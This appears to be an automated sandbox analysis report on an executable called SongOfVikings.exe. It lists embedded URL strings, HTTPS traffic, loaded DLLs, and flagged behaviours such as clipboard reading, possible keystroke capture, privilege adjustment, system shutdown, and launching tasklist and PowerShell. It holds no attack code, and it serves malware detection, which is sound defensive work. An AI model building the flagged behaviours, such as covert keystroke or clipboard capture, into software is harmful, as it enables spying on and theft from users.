Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#cannot-have-a-username-password-port
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-url-origin
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-byte-serializer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-parser
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#concept-urlencoded-serializer
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#forbidden-host-code-point
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#special-scheme
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#url-serializing
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://url.spec.whatwg.org/#urlsearchparams-stringification-behavior
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://v8.dev/blog/v8-release-89
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/manifest/#installability-signals
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-mark-resource-timing
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dfn-setup-the-resource-timing-entry
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/resource-timing/#dom-performance-setresourcetimingbuffersize
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#grammardef-option-expression
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#integrity-metadata-description
Source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#parse-metadata
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/webappsec-subresource-integrity/#the-integrity-attribute
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webassembly.github.io/spec/web-api
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webidl.spec.whatwg.org/#es-dictionary
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webrtc.googlesource.com/src/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/characteristics
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/descriptors
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bluetooth.com/specifications/gatt/services
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5644273861001216.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5682658461876224.
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.chromestatus.com/feature/5718547946799104
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.cisco.com/c/en/us/about/legal/privacy-full.html
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-line-terminators
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/#sec-promise.all
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ecma-international.org/ecma-262/5.1/#sec-15.1.3.4
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/licenses/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software/automake/
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.gnu.org/software/coreutils/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.iana.org/assignments/tls-extensiontype-values
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.nic.cz/odvr/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.nic.cz/odvr/CZ.NIC
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.perl.org/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.quad9.net/home/privacy/
Source: SongOfVikings.exe, 00000005.00000000.1942201122.00007FF692ACA000.00000002.00000001.01000000.0000000E.sdmp	String found in binary or memory: https://www.quad9.net/home/privacy/Quad9
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.rfc-editor.org/rfc/rfc9110#section-5.2
Source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.sqlite.org/src/info/fac496b61722daf2
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.swift.org/download/
Source: SongOfVikings.exe, 00000000.00000003.1836622176.0000000007310000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt
Source: SongOfVikings.exe, 00000000.00000003.1845802895.00000000051B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.unicode.org/copyright.html.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405461

Installs a raw input device (often for capturing keystrokes)

Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_2937931d-9

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\SongOfVikings.exe	File dump: SongOfVikings.exe.0.dr 162141184			Jump to dropped file
Source: C:\Users\user\Desktop\SongOfVikings.exe	File dump: SongOfVikings.exe0.0.dr 162141184			Jump to dropped file

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\SongOfVikings.exe

Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040338F

Detected potential crypto function

Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00406B15	0_2_00406B15
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_004072EC	0_2_004072EC
Source: C:\Users\user\Desktop\SongOfVikings.exe	Code function: 0_2_00404C9E	0_2_00404C9E

Enables security privileges

Source: C:\Users\user\Desktop\SongOfVikings.exe

Process token adjusted: Security

Jump to behavior

PE file contains more sections than normal

Source: SongOfVikings.exe0.0.dr	Static PE information: Number of sections : 15 > 10
Source: libEGL.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: vk_swiftshader.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libGLESv2.dll0.0.dr	Static PE information: Number of sections : 11 > 10
Source: vulkan-1.dll.0.dr	Static PE information: Number of sections : 11 > 10
Source: libEGL.dll0.0.dr	Static PE information: Number of sections : 11 > 10
Source: SongOfVikings.exe.0.dr	Static PE information: Number of sections : 15 > 10

Sample file is different than original file name gathered from version info

Source: SongOfVikings.exe, 00000000.00000003.1836425269.0000000006E10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilename< vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1843324879.00000000051BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevk_swiftshader.dll, vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dllb! vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1778995184.0000000006036000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamed3dcompiler_47.dllj% vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1851320142.00000000051BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename< vs SongOfVikings.exe
Source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameElevate.exeH vs SongOfVikings.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SongOfVikings.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ffmpeg.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kbdus.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
